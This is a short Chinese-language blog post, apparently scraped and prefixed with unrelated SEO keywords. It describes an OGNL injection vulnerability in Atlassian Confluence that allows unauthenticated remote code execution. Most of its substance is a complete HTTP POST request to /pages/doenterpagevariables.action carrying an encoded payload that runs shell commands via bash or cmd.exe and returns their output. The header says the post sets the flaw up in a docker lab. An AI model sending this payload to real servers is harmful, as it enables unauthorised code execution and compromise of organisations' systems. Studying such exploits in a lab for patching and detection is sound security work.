一站式建设网站,wordpress pdf 显示不了,dw用ps切片做网站,制造企业网站建设漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。
存在一个 OGNL 注入漏洞#xff0c;允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
漏洞环境及利用
搭建docker环境 Confluence搭建见前文
Atlas…漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。
存在一个 OGNL 注入漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
漏洞环境及利用
搭建·docker环境 Confluence搭建见前文
Atlassian Confluence 路径遍历和命令执行漏洞 CVE-2019-3396-CSDN博客
payload如下 POST /pages/doenterpagevariables.action HTTP/1.1 Host: 192.168.232.128:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1062 queryString%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027varisWin%3djava.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3bvarcmd%3dnewjava.lang.String%28%5cu0022id%5cu0022%29%3bvarp%3dnewjava.lang.ProcessBuilder%28%29%3bif%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c%5cu0022%2fc%5cu0022%2ccmd%29%3b%7delse%7bp.command%28%5cu0022bash%5cu0022%2c%5cu0022-c%5cu0022%2ccmd%29%3b%7dp.redirectErrorStream%28true%29%3bvarprocess%3dp.start%28%29%3bvarinputStreamReader%3dnewjava.io.InputStreamReader%28process.getInputStream%28%29%29%3bvarbufferedReader%3dnewjava.io.BufferedReader%28inputStreamReader%29%3bvarline%3d%5cu0022%5cu0022%3bvaroutput%3d%5cu0022%5cu0022%3bwhile%28%28line%3dbufferedReader.readLine%28%29%29%21%3dnull%29%7boutput%3doutput%2bline%2bjava.lang.Character.toString%2810%29%3b%7d%5cu0027%29%7d%2b%5cu0027 运行结果